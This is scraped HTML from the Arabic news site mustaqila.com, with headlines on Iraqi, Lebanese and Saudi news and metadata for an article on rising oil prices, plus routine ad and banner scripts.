				<div class="term-badges floated"><span class="term-badge term-16487"><a href="https://mustaqila.com/iq/">اخبار العراق</a></span></div>				<a  title="اختتام ورشة لمناقشة مشروع قانون العمل في إقليم كردستان" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/thumbnail-1-1-750x249.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;thumbnail-1-1-e1663177375151-210x84.jpg&quot;,&quot;279&quot;:&quot;thumbnail-1-1-e1663177375151-279x84.jpg&quot;,&quot;357&quot;:&quot;thumbnail-1-1-e1663177375151-357x84.jpg&quot;,&quot;513&quot;:&quot;thumbnail-1-1-e1663177375151.jpg&quot;,&quot;750&quot;:&quot;thumbnail-1-1-750x249.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d8%ae%d8%aa%d8%aa%d8%a7%d9%85-%d9%88%d8%b1%d8%b4%d8%a9-%d9%84%d9%85%d9%86%d8%a7%d9%82%d8%b4%d8%a9-%d9%85%d8%b4%d8%b1%d9%88%d8%b9-%d9%82%d8%a7%d9%86%d9%88%d9%86-%d8%a7%d9%84%d8%b9%d9%85%d9%84/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d8%ae%d8%aa%d8%aa%d8%a7%d9%85-%d9%88%d8%b1%d8%b4%d8%a9-%d9%84%d9%85%d9%86%d8%a7%d9%82%d8%b4%d8%a9-%d9%85%d8%b4%d8%b1%d9%88%d8%b9-%d9%82%d8%a7%d9%86%d9%88%d9%86-%d8%a7%d9%84%d8%b9%d9%85%d9%84/" class="post-title post-url">
			اختتام ورشة لمناقشة مشروع قانون العمل في إقليم كردستان		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-14T20:43:10+03:00">سبتمبر 14, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517415 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-16487 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-16487"><a href="https://mustaqila.com/iq/">اخبار العراق</a></span></div>				<a  title="الكاظمي: وفرنا الأموال لزيارة الاربعينية رغم غياب الموازنة" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/D79CB61F-7850-4A99-BE59-E3E012350CE9-1280x640-1-750x430.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;D79CB61F-7850-4A99-BE59-E3E012350CE9-1280x640-1-210x136.jpeg&quot;,&quot;279&quot;:&quot;D79CB61F-7850-4A99-BE59-E3E012350CE9-1280x640-1-279x220.jpeg&quot;,&quot;357&quot;:&quot;D79CB61F-7850-4A99-BE59-E3E012350CE9-1280x640-1-357x210.jpeg&quot;,&quot;750&quot;:&quot;D79CB61F-7850-4A99-BE59-E3E012350CE9-1280x640-1-750x430.jpeg&quot;,&quot;1280&quot;:&quot;D79CB61F-7850-4A99-BE59-E3E012350CE9-1280x640-1.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d9%83%d8%a7%d8%b8%d9%85%d9%8a-%d9%88%d9%81%d8%b1%d9%86%d8%a7-%d8%a7%d9%84%d8%a3%d9%85%d9%88%d8%a7%d9%84-%d9%84%d8%b2%d9%8a%d8%a7%d8%b1%d8%a9-%d8%a7%d9%84%d8%a7%d8%b1%d8%a8%d8%b9%d9%8a/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d9%83%d8%a7%d8%b8%d9%85%d9%8a-%d9%88%d9%81%d8%b1%d9%86%d8%a7-%d8%a7%d9%84%d8%a3%d9%85%d9%88%d8%a7%d9%84-%d9%84%d8%b2%d9%8a%d8%a7%d8%b1%d8%a9-%d8%a7%d9%84%d8%a7%d8%b1%d8%a8%d8%b9%d9%8a/" class="post-title post-url">
			الكاظمي: وفرنا الأموال لزيارة الاربعينية رغم غياب الموازنة		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-14T20:39:31+03:00">سبتمبر 14, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517412 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="سيدة لبنانية تقتحم بنك باستخدام السلاح لإطلاق وديعتها" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/LVIFHAEPRW-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;LVIFHAEPRW-210x136.jpg&quot;,&quot;279&quot;:&quot;LVIFHAEPRW-279x220.jpg&quot;,&quot;357&quot;:&quot;LVIFHAEPRW-357x210.jpg&quot;,&quot;750&quot;:&quot;LVIFHAEPRW-750x430.jpg&quot;,&quot;900&quot;:&quot;LVIFHAEPRW.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%b3%d9%8a%d8%af%d8%a9-%d9%84%d8%a8%d9%86%d8%a7%d9%86%d9%8a%d8%a9-%d8%aa%d9%82%d8%aa%d8%ad%d9%85-%d8%a8%d9%86%d9%83-%d8%a8%d8%a7%d8%b3%d8%aa%d8%ae%d8%af%d8%a7%d9%85-%d8%a7%d9%84%d8%b3%d9%84%d8%a7/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%b3%d9%8a%d8%af%d8%a9-%d9%84%d8%a8%d9%86%d8%a7%d9%86%d9%8a%d8%a9-%d8%aa%d9%82%d8%aa%d8%ad%d9%85-%d8%a8%d9%86%d9%83-%d8%a8%d8%a7%d8%b3%d8%aa%d8%ae%d8%af%d8%a7%d9%85-%d8%a7%d9%84%d8%b3%d9%84%d8%a7/" class="post-title post-url">
			سيدة لبنانية تقتحم بنك باستخدام السلاح لإطلاق وديعتها		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-14T20:30:27+03:00">سبتمبر 14, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517409 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-20280 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-20280"><a href="https://mustaqila.com/ksa/">اخبار السعودية</a></span></div>				<a  title="السعودية ريما الجفالي تحقق انتصاراً جديداً في النمسا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/mail-1-1-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;mail-1-1-210x136.jpg&quot;,&quot;279&quot;:&quot;mail-1-1-279x220.jpg&quot;,&quot;357&quot;:&quot;mail-1-1-357x210.jpg&quot;,&quot;750&quot;:&quot;mail-1-1-750x430.jpg&quot;,&quot;1270&quot;:&quot;mail-1-1.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d8%b9%d9%88%d8%af%d9%8a%d8%a9-%d8%b1%d9%8a%d9%85%d8%a7-%d8%a7%d9%84%d8%ac%d9%81%d8%a7%d9%84%d9%8a-%d8%aa%d8%ad%d9%82%d9%82-%d8%a7%d9%86%d8%aa%d8%b5%d8%a7%d8%b1%d8%a7%d9%8b-%d8%ac/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d8%b9%d9%88%d8%af%d9%8a%d8%a9-%d8%b1%d9%8a%d9%85%d8%a7-%d8%a7%d9%84%d8%ac%d9%81%d8%a7%d9%84%d9%8a-%d8%aa%d8%ad%d9%82%d9%82-%d8%a7%d9%86%d8%aa%d8%b5%d8%a7%d8%b1%d8%a7%d9%8b-%d8%ac/" class="post-title post-url">
			السعودية ريما الجفالي تحقق انتصاراً جديداً في النمسا		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-14T19:20:06+03:00">سبتمبر 14, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	
	</div><div class="bs-pagination bs-ajax-pagination infinity main-term-none clearfix">
							<a  rel="next" class="btn-bs-pagination" data-id="1204523492"
				   title="المزيد من الاخبار">
			<span class="loading" style="display: none;">
				<i class="fa fa-refresh fa-spin fa-fw"></i>
			</span>
					<span class="loading" style="display: none;">
				جار التحميل ...			</span>

					<span class="loaded txt">
				المزيد من الاخبار			</span>

					<span class="loaded icon">
				<i class="fa fa-angle-down" aria-hidden="true"></i>
			</span>

					<span class="no-more" style="display: none;">
				لا مزيد من المشاركات 
			</span>

				</a>

				</div></div></div></div></div></div>
<style type="text/css" data-type="vc_custom-css">.post-summary {
    font-family: Tahoma,Verdana,Segoe,sans-serif;
    font-weight: 400;
    line-height: 22px;
    font-size: 15px;
    text-align: inherit;
    text-transform: initial;
    color: #888888;
    display: none !important;
}</style></div>	<footer id="site-footer" class="site-footer full-width">
		<div class="footer-widgets light-text">
	<div class="content-wrap">
		<div class="container">
			<div class="row">
										<div class="col-sm-3">
							<aside id="sidebar-footer-1" class="sidebar" role="complementary" aria-label="Footer - Column 1 Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
								<div id="bs-about-2" class=" h-ni bs-hidden-xs w-t footer-widget footer-column-1 widget widget_bs-about"><div class="section-heading sh-t2 sh-s3"><span class="h-text">وكالة الصحافة المستقلة</span></div><div  class="bs-shortcode bs-about ">
		<h4 class="about-title">
		<a href="https://www.mustaqila.com/%d8%b9%d9%86-%d8%a7%d9%84%d9%88%d9%83%d8%a7%d9%84%d8%a9/"></a>	</h4>
	<div class="about-text">
		<p>تنتمي ” المستقلة ” الى العراق شعبا وارضا وتاريخا وحضارة .. ترمي لمدً انشطتها الى  كل ميادين الحياة ، وتسعى الى ملاحقة الاحداث اليومية بصفاء وصدق ، كيما تجسد الحقيقة وتضعها في المكانة اللائقة ، وتبدد العتمة حتى تمتلأ القلوب والعقول بوهج الحياة المفعمة بالخير والنماء.</p>
	</div>
			<div class="about-link heading-typo">
			<a href="https://www.mustaqila.com/%d8%b9%d9%86-%d8%a7%d9%84%d9%88%d9%83%d8%a7%d9%84%d8%a9/">اقرأ أكثر...</a>
		</div>
	</div>
</div>							</aside>
						</div>
						<div class="col-sm-3">
							<aside id="sidebar-footer-2" class="sidebar" role="complementary" aria-label="Footer - Column 2 Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
								<div id="bs-popular-categories-2" class=" h-ni bs-hidden-xs w-t footer-widget footer-column-2 widget widget_bs-popular-categories"><div class="section-heading sh-t2 sh-s3"><span class="h-text">أشهر الاقسام</span></div>	<div  class="bs-shortcode bs-popular-categories ">
					<ul class="bs-popular-terms-list">
				<li class="bs-popular-term-item term-item-83">
					<a href="https://mustaqila.com/last/">اخر الاخبار<span class="term-count">70341</span></a>
				  </li><li class="bs-popular-term-item term-item-34">
					<a href="https://mustaqila.com/political/">سياسية<span class="term-count">21805</span></a>
				  </li><li class="bs-popular-term-item term-item-7">
					<a href="https://mustaqila.com/general/">عامة ومنوعات<span class="term-count">19289</span></a>
				  </li><li class="bs-popular-term-item term-item-907">
					<a href="https://mustaqila.com/arts/">ثقافة وفنون<span class="term-count">14749</span></a>
				  </li><li class="bs-popular-term-item term-item-46">
					<a href="https://mustaqila.com/economy/">اقتصادية<span class="term-count">12669</span></a>
				  </li><li class="bs-popular-term-item term-item-1055">
					<a href="https://mustaqila.com/sport/">رياضية<span class="term-count">10842</span></a>
				  </li>			</ul>
				</div>
</div>							</aside>
						</div>
						<div class="col-sm-3">
							<aside id="sidebar-footer-3" class="sidebar" role="complementary" aria-label="Footer - Column 3 Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
								<div id="text-15" class=" h-ni bs-hidden-xs w-t footer-widget footer-column-3 widget widget_text"><div class="section-heading sh-t2 sh-s3"><span class="h-text">موسوعة الاخبار</span></div>			<div class="textwidget"><p>تابع اخر الاخبار في مكان واحد من موسوعة الاخبار</p>
<p><a href="http://wiki-news.net/">موسوعة الاخبار &#8211; Wiki news</a></p>
</div>
		</div>							</aside>
						</div>
						<div class="col-sm-3">
							<aside id="sidebar-footer-4" class="sidebar" role="complementary" aria-label="Footer - Column 4 Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
								<div id="text-14" class=" h-ni bs-hidden-xs w-t footer-widget footer-column-4 widget widget_text"><div class="section-heading sh-t2 sh-s3"><span class="h-text">المستقلة موبايل</span></div>			<div class="textwidget"><p>تابع اخر الاخبار والاحداث على هاتفك الذكي من خلال المستقلة موبايل</p>
<p><a href="https://apps.apple.com/jo/app/%D9%88%D9%83%D8%A7%D9%84%D8%A9-%D8%A7%D9%84%D8%B5%D8%AD%D8%A7%D9%81%D8%A9-%D8%A7%D9%84%D9%85%D8%B3%D8%AA%D9%82%D9%84%D8%A9/id1038258912"><img loading="lazy" class="alignnone size-full wp-image-324562" src="https://i0.wp.com/i68.servimg.com/u/f68/11/87/36/37/appsto10.png?resize=225%2C66&#038;ssl=1" alt="" width="225" height="66" data-recalc-dims="1" /></a> <a href="https://play.google.com/store/apps/details?id=com.mustaqila"><img loading="lazy" class="alignnone size-medium wp-image-324563" src="https://i0.wp.com/i68.servimg.com/u/f68/11/87/36/37/mus_gp10.png?resize=225%2C66&#038;ssl=1" alt="" width="225" height="66" data-recalc-dims="1" /></a></p>
</div>
		</div>							</aside>
						</div>
									</div>
		</div>
	</div>
</div>
		<div class="copy-footer">
			<div class="content-wrap">
				<div class="container">
						<div class="row">
		<div class="col-lg-12">
			<div id="menu-footer" class="menu footer-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
				<nav class="footer-menu-container">
					<ul id="footer-navigation" class="footer-menu menu clearfix">
						<li id="menu-item-329769" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-34 better-anim-fade menu-item-329769"><a href="https://mustaqila.com/political/">سياسية</a></li>
<li id="menu-item-329763" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-46 better-anim-fade menu-item-329763"><a href="https://mustaqila.com/economy/">اقتصادية</a></li>
<li id="menu-item-329764" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-31 better-anim-fade menu-item-329764"><a href="https://mustaqila.com/security/">امنية</a></li>
<li id="menu-item-329768" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-1055 better-anim-fade menu-item-329768"><a href="https://mustaqila.com/sport/">رياضية</a></li>
<li id="menu-item-329770" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-6 better-anim-fade menu-item-329770"><a href="https://mustaqila.com/health/">طب و صحة</a></li>
<li id="menu-item-329767" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-907 better-anim-fade menu-item-329767"><a href="https://mustaqila.com/arts/">ثقافة وفنون</a></li>
<li id="menu-item-329771" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-7 better-anim-fade menu-item-329771"><a href="https://mustaqila.com/general/">عامة ومنوعات</a></li>
<li id="menu-item-329775" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-9 better-anim-fade menu-item-329775"><a href="https://mustaqila.com/technology/">علوم و تكنولوجيا</a></li>
<li id="menu-item-329772" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-8 better-anim-fade menu-item-329772"><a href="https://mustaqila.com/international/">عربي و دولي</a>
<ul class="sub-menu">
	<li id="menu-item-329773" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-33 better-anim-fade menu-item-329773"><a href="https://mustaqila.com/international/world/">دولي</a></li>
	<li id="menu-item-329774" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-37 better-anim-fade menu-item-329774"><a href="https://mustaqila.com/international/arab-news/">عربي</a></li>
</ul>
</li>
<li id="menu-item-329776" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-30 better-anim-fade menu-item-329776"><a href="https://mustaqila.com/articles/">مقالات مختارة</a></li>
<li id="menu-item-329765" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-9606 better-anim-fade menu-item-329765"><a href="https://mustaqila.com/infographic/">انفوجرافيك</a></li>
<li id="menu-item-329777" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-10 better-anim-fade menu-item-329777"><a href="https://mustaqila.com/video/">مكتبة الفيديو</a></li>
					</ul>
				</nav>
			</div>
		</div>
	</div>
					<div class="row footer-copy-row">
						<div class="copy-1 col-lg-6 col-md-6 col-sm-6 col-xs-12">
							وكالة الصحافة المستقلة - 2022.						</div>
						<div class="copy-2 col-lg-6 col-md-6 col-sm-6 col-xs-12">
													</div>
					</div>
				</div>
			</div>
		</div>
	</footer><!-- .footer -->
		</div><!-- .main-wrap -->
			<span class="back-top"><i class="fa fa-arrow-up"></i></span>

<!-- Global site tag (gtag.js) - Google Analytics -->

		
				<div id="amp-mobile-version-switcher" hidden>
			<a rel="" href="https://mustaqila.com/%D8%A7%D8%B1%D8%AA%D9%81%D8%A7%D8%B9-%D8%A7%D8%B3%D8%B9%D8%A7%D8%B1-%D8%A7%D9%84%D9%86%D9%81%D8%B7-%D8%A8%D8%B3%D8%A8%D8%A8-%D8%AA%D9%88%D9%82%D9%81-%D9%88%D8%B4%D9%8A%D9%83-%D9%84%D9%84%D8%B3%D9%83/amp/">
				Go to mobile version			</a>
		</div>

				

		<div class="rh-cover noscroll  no-login-icon" style="background-color: #131939">
			<span class="rh-close"></span>
			<div class="rh-panel rh-pm">
				<div class="rh-p-h">
									</div>

				<div class="rh-p-b">
										<div class="rh-c-m clearfix"><ul id="resp-navigation" class="resp-menu menu clearfix"><li class="menu-item menu-item-type-custom menu-item-object-custom better-anim-fade menu-item-326611"><a href="https://www.mustaqila.com/latest">كل الاخبار</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-34 better-anim-fade menu-item-210152"><a href="https://mustaqila.com/political/">سياسية</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-46 better-anim-fade menu-item-210148"><a href="https://mustaqila.com/economy/">اقتصادية</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-31 better-anim-fade menu-item-210149"><a href="https://mustaqila.com/security/">امنية</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-1055 better-anim-fade menu-item-210151"><a href="https://mustaqila.com/sport/">رياضية</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-6 better-anim-fade menu-item-210153"><a href="https://mustaqila.com/health/">صحة</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-907 better-anim-fade menu-item-210150"><a href="https://mustaqila.com/arts/">فن</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-7 better-anim-fade menu-item-210154"><a href="https://mustaqila.com/general/">منوعات</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-8 better-anim-fade menu-item-210156"><a href="https://mustaqila.com/international/">عربي و دولي</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-33 better-anim-fade menu-item-210157"><a href="https://mustaqila.com/international/world/">دولي</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-37 better-anim-fade menu-item-210158"><a href="https://mustaqila.com/international/arab-news/">عربي</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-9 better-anim-fade menu-item-210159"><a href="https://mustaqila.com/technology/">علوم و تكنولوجيا</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-30 better-anim-fade menu-item-210160"><a href="https://mustaqila.com/articles/">مقالات</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children better-anim-fade menu-item-405729"><a href="#">حسب الدول</a>
<ul class="sub-menu">
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-16487 better-anim-fade menu-item-407192"><a href="https://mustaqila.com/iq/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/10/iraq-1.png"></i>اخبار العراق</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-23821 better-anim-fade menu-item-467764"><a href="https://mustaqila.com/palestine/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2021/05/palestine.png"></i>اخبار فلسطين</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-17579 better-anim-fade menu-item-440480"><a href="https://mustaqila.com/egy/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/11/egypt.png"></i>اخبار مصر</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-20280 better-anim-fade menu-item-444502"><a href="https://mustaqila.com/ksa/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2021/02/saudi-arabia.png"></i>اخبار السعودية</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-21593 better-anim-fade menu-item-453695"><a href="https://mustaqila.com/jordan/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/10/jordan.png"></i>اخبار الاردن</a></li>
	<li class="menu-have-icon menu-icon-type-custom-icon menu-item menu-item-type-taxonomy menu-item-object-category menu-term-26210 better-anim-fade menu-item-497367"><a href="https://mustaqila.com/%d8%a7%d8%ae%d8%a8%d8%a7%d8%b1-%d9%82%d8%b7%d8%b1/"><i class="bf-icon bf-custom-icon "><img style="max-width:16px" src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/01/qater.png"></i>اخبار قطر</a></li>
</ul>
</li>
</ul></div>

											<form role="search" method="get" class="search-form" action="https://mustaqila.com">
							<input type="search" class="search-field"
							       placeholder="بحث..."
							       value="" name="s"
							       title="البحث عن:"
							       autocomplete="off">
							<input type="submit" class="search-submit" value="">
						</form>
										</div>
			</div>
					</div>
		<noscript><link rel='stylesheet' id='js_composer_front-css'  href='https://mustaqila.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.6.0' type='text/css' media='all' />
</noscript><link rel='stylesheet' id='js_composer_front-css'  href='https://mustaqila.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.6.0' type='text/css' media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" />









<script type="text/javascript">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</script><script type="application/ld+json" class="yoast-schema-graph">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</script><script type="text/javascript">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</script><script type="application/ld+json">{
    "@context": "http://schema.org/",
    "@type": "Organization",
    "@id": "#organization",
    "logo": {
        "@type": "ImageObject",
        "url": "https://www.mustaqila.com/wp-content/uploads/2021/02/mustaqila_logo.png"
    },
    "url": "https://mustaqila.com/",
    "name": "\u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0635\u062d\u0627\u0641\u0629 \u0627\u0644\u0645\u0633\u062a\u0642\u0644\u0629",
    "description": "\u0627\u062e\u0628\u0627\u0631 \u0627\u0644\u0639\u0631\u0627\u0642 - \u0633\u064a\u0627\u0633\u0629 - \u0645\u0627\u0644 \u0648\u0627\u0639\u0645\u0627\u0644 - \u0627\u062e\u0628\u0627\u0631 \u0641\u0646\u064a\u0629"
}</script><script type="application/ld+json">{
    "@context": "http://schema.org/",
    "@type": "WebSite",
    "name": "\u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0635\u062d\u0627\u0641\u0629 \u0627\u0644\u0645\u0633\u062a\u0642\u0644\u0629",
    "alternateName": "\u0627\u062e\u0628\u0627\u0631 \u0627\u0644\u0639\u0631\u0627\u0642 - \u0633\u064a\u0627\u0633\u0629 - \u0645\u0627\u0644 \u0648\u0627\u0639\u0645\u0627\u0644 - \u0627\u062e\u0628\u0627\u0631 \u0641\u0646\u064a\u0629",
    "url": "https://mustaqila.com/"
}</script><script type="application/ld+json">{
    "@context": "http://schema.org/",
    "@type": "NewsArticle",
    "headline": "\u0627\u0631\u062a\u0641\u0627\u0639 \u0627\u0633\u0639\u0627\u0631 \u0627\u0644\u0646\u0641\u0637 \u0628\u0633\u0628\u0628 \u062a\u0648\u0642\u0641 \u0648\u0634\u064a\u0643 \u0644\u0644\u0633\u0643\u0643 \u0627\u0644\u062d\u062f\u064a\u062f\u064a\u0629 \u0641\u064a \u0627\u0645\u0631\u064a\u0643\u0627",
    "description": "\u0627\u0644\u0645\u0633\u062a\u0642\u0644\u0629 /- \u0627\u0631\u062a\u0641\u0639\u062a \u0623\u0633\u0639\u0627\u0631 \u0627\u0644\u0646\u0641\u0637\u060c \u064a\u0648\u0645 \u0627\u0644\u062e\u0645\u064a\u0633\u060c \u0645\u0639 \u0627\u0644\u0645\u062e\u0627\u0648\u0641 \u0628\u0634\u0623\u0646 \u0627\u0644\u0625\u0645\u062f\u0627\u062f\u0627\u062a \u0648\u062a\u0648\u0642\u0641 \u0648\u0634\u064a\u0643 \u0644\u0644\u0633\u0643\u0643 \u0627\u0644\u062d\u062f\u064a\u062f\u064a\u0629 \u0641\u064a \u0627\u0644\u0648\u0644\u0627\u064a\u0627\u062a \u0627\u0644\u0645\u062a\u062d\u062f\u0629\u060c \u0623\u0643\u0628\u0631 \u0645\u0633\u062a\u0647\u0644\u0643 \u0644\u0644\u062e\u0627\u0645 \u0641\u064a \u0627\u0644\u0639\u0627\u0644\u0645 .\u0648\u0627\u0631\u062a\u0641\u0639\u062a \u0627\u0644\u0639\u0642\u0648\u062f \u0627\u0644\u0622\u062c\u0644\u0629 \u0644\u062e\u0627\u0645 \u0628\u0631\u0646\u062a 38 \u0633\u0646\u062a\u0627 \u0623\u0648 0.4 \u0628\u0627\u0644\u0645\u0626\u0629 \u0625\u0644\u0649 94.48 \u062f\u0648\u0644\u0627\u0631\u0627\u064b \u0644\u0644\u0628\u0631\u0645\u064a\u0644 \u0628\u062d\u0644\u0648\u0644 \u0627\u0644\u0633\u0627\u0639\u0629 03:13 \u0628\u062a\u0648\u0642\u064a",
    "datePublished": "2022-09-15",
    "dateModified": "2022-09-15",
    "author": {
        "@type": "Person",
        "@id": "#person-Abdulmalk",
        "name": "Abdulmalk"
    },
    "image": "https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/oil.jpg",
    "interactionStatistic": [
        {
            "@type": "InteractionCounter",
            "interactionType": "http://schema.org/CommentAction",
            "userInteractionCount": "0"
        }
    ],
    "publisher": {
        "@id": "#organization"
    },
    "mainEntityOfPage": "https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a7%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d9%86%d9%81%d8%b7-%d8%a8%d8%b3%d8%a8%d8%a8-%d8%aa%d9%88%d9%82%d9%81-%d9%88%d8%b4%d9%8a%d9%83-%d9%84%d9%84%d8%b3%d9%83/"
}</script><script src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/javascript">var betterads_screen_width = document.body.clientWidth;betterads_el = document.getElementById('tqysxwz-324247-791549367');             if (betterads_el.getBoundingClientRect().width) {     betterads_el_width_raw = betterads_el_width = betterads_el.getBoundingClientRect().width;    } else {     betterads_el_width_raw = betterads_el_width = betterads_el.offsetWidth;    }        var size = ["125", "125"];    if ( betterads_el_width >= 728 )      betterads_el_width = ["728", "90"];    else if ( betterads_el_width >= 468 )     betterads_el_width = ["468", "60"];    else if ( betterads_el_width >= 336 )     betterads_el_width = ["336", "280"];    else if ( betterads_el_width >= 300 )     betterads_el_width = ["300", "250"];    else if ( betterads_el_width >= 250 )     betterads_el_width = ["250", "250"];    else if ( betterads_el_width >= 200 )     betterads_el_width = ["200", "200"];    else if ( betterads_el_width >= 180 )     betterads_el_width = ["180", "150"]; if ( betterads_screen_width >= 1140 ) {          document.getElementById('tqysxwz-324247-791549367-place').innerHTML = '<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="3357330906" ></ins>';          (adsbygoogle = window.adsbygoogle || []).push({});         }</script><SCRIPT LANGUAGE="Javascript"><!-- 
function banner() { 
 }; 
 banner = new banner(); 
 number = 0; 

banner[number++] = "<a href='http://glwanapps.com/nous/' target='_blank'><img src='https://i.ibb.co/4fCnfYS/Untitled-1.gif' border='0' width='365px'></a>"

 banner[number++] = "<a href='http://onelink.to/mustaqila' target='_blank'><img src='https://i.ibb.co/JqsSr75/Untitled-1.gif' border='0' width='365px'></a>" 


increment = Math.floor(Math.random() * number); 
 document.write(banner[increment]); 
